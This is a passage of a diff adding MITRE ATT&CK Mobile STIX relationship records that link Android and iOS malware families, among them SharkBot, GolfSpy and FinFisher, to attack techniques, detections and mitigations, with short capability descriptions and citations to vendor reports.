"source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--be7c3f83-b164-4d53-bfac-65f7437dabec", + "created": "2023-03-20T18:54:36.266Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:36.266Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ba5fc090-d420-4006-9dc0-57b75260b5f6", + "type": "relationship", + "created": "2020-07-15T20:20:59.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.296Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can collect the device’s location.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9f83d618-a42d-4797-b9fe-030affdbd13f", + "created": "2023-01-18T19:46:45.399Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:49:35.020Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can hide and send SMS messages. [SharkBot](https://attack.mitre.org/software/S1055) can also change which application is the device’s default SMS handler.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3efe7dcc-a572-45ac-aff2-2932206a0632", + "created": "2019-08-07T15:57:13.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:52:06.559Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) can access and upload the device's contact list to the command and control server.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--433af79b-ce77-4a4c-84f7-6cdc34e70674", + "created": "2023-01-18T19:56:01.025Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:48:53.396Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can intercept SMS messages.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--10e02179-0434-4d4b-86b4-5d9fbc5d5451", + "type": "relationship", + "created": "2019-10-10T15:03:27.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." + } + ], + "modified": "2019-10-10T15:03:27.682Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) One encrypts data using XOR prior to exfiltration.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65a24b75-4bb0-441a-8cb2-a34077b13f61", + "type": "relationship", + "created": "2020-01-27T17:05:58.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-03-26T20:50:07.154Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can collect local accounts on the device, pictures, bookmarks/histories of the default browser, and files stored on the SD card. [GolfSpy](https://attack.mitre.org/software/S0421) can list image, audio, video, and other files stored on the device. [GolfSpy](https://attack.mitre.org/software/S0421) can copy arbitrary files from the device.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--173c0c41-c7e3-48e9-b785-d9e0232d85ca", + "created": "2020-09-11T16:22:03.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:50:52.737Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s contact list.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2de76a24-ec87-4808-b0d3-b84d318ac22c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) can read and write data in the user’s clipboard.(Citation: PaloAlto-XcodeGhost)", + "relationship_type": "uses", + "source_ref": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--789cb76e-27b0-4762-a2f7-3ff32ce0762d", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[PJApps](https://attack.mitre.org/software/S0291) has the capability to collect and leak the victim's phone number, mobile device unique identifier (IMEI).(Citation: Lookout-EnterpriseApps)", + "relationship_type": "uses", + "source_ref": "malware--c709da93-20c3-4d17-ab68-48cba76b2137", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e5e4567e-05a3-4d79-beab-191efc336473", + "type": "relationship", + "created": "2020-01-27T17:05:58.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-03-26T20:50:07.266Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) encrypts data using a simple XOR operation with a pre-configured key prior to exfiltration.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a8dd6ed7-910d-4bae-a2a8-19f3f32c915c", + "type": "relationship", + "created": "2019-09-23T13:36:08.390Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-14T20:49:24.646Z", + "description": "Starting in 2017, the [Rotexy](https://attack.mitre.org/software/S0411) DEX file was packed with garbage strings and/or operations.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be39c012-7201-4757-8cd6-c855bc945a9e", + "type": "relationship", + "created": "2019-07-10T15:25:57.623Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.568Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) comes packaged with ExynosAbuse, an Android exploit that can gain root privileges.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be136fd1-6949-4de6-be37-6d76f8def41a", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-10-15T19:37:21.366Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests location data from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--945db15a-b356-4e05-a6a0-9b24ca9aa348", + "created": "2022-04-20T17:42:11.714Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:15.440Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) uses standard HTTP for exfiltration.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8936c564-b11a-4c9e-a32a-76e7d7e0c8b0", + "type": "relationship", + "created": "2020-04-24T15:12:11.185Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-04-24T15:12:11.185Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) requests permissions to use the device camera.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--92c9106d-a71b-4a4f-a9d4-ef692a0294eb", + "type": "relationship", + "created": "2020-06-26T14:55:13.261Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.261Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can collect system information such as OS version, device vendor, and the type of screen lock that is active on the device.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fc816ddc-199d-47b0-93af-c81305d0919f", + "type": "relationship", + "created": "2020-06-02T14:32:31.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.767Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) has utilized malicious JavaScript and iframes to exploit WebKit running on vulnerable iOS 12 devices.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--fd339382-bfec-4bf0-8d47-1caedc9e7e57", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7cae8c80-c603-4352-a704-f3a2f4aa4a56", + "created": "2019-09-03T20:08:00.737Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) abuses accessibility features to intercept all interactions between a user and the device.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:39:08.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--eca02e5c-f8de-4436-a7dd-0f656c759a42", + "type": "relationship", + "created": "2021-10-01T14:42:48.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "modified": "2021-10-06T15:32:46.477Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can use its keylogger module to take screenshots of the area of the screen that the user tapped.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59d463d3-3a41-4269-be9a-7a69f44eca78", + "created": "2020-10-29T19:21:23.215Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:03:47.434Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has communicated with the C2 server using HTTP.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ac31f650-4bd2-4bb6-b450-71e66db4888f", + "created": "2022-03-30T19:28:55.980Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates typically provide patches for vulnerabilities that could be abused by malicious applications.", + "modified": "2022-03-30T19:28:55.980Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--91a4924f-2519-4662-91f2-b7ef715a459f", + "created": "2023-03-20T18:59:55.756Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:59:55.756Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e14db7d0-4053-4e0a-8b43-b950133e6e36", + "created": "2023-03-20T18:41:31.300Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:31.300Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7258542e-029b-45b9-be69-6e76d9c93b35", + "created": "2020-09-14T13:35:45.886Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET-Twitoor", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:43:03.565Z", + "description": "[Twitoor](https://attack.mitre.org/software/S0302) can hide its presence on the system.(Citation: ESET-Twitoor)", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b5e8cef4-e8a1-484f-baae-cf12b26e6070", + "created": "2020-12-18T20:14:47.302Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has used Firebase for C2 communication.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-18T19:18:56.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6086e1e2-1b39-4ff2-910e-4a4eb86d57b7", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + 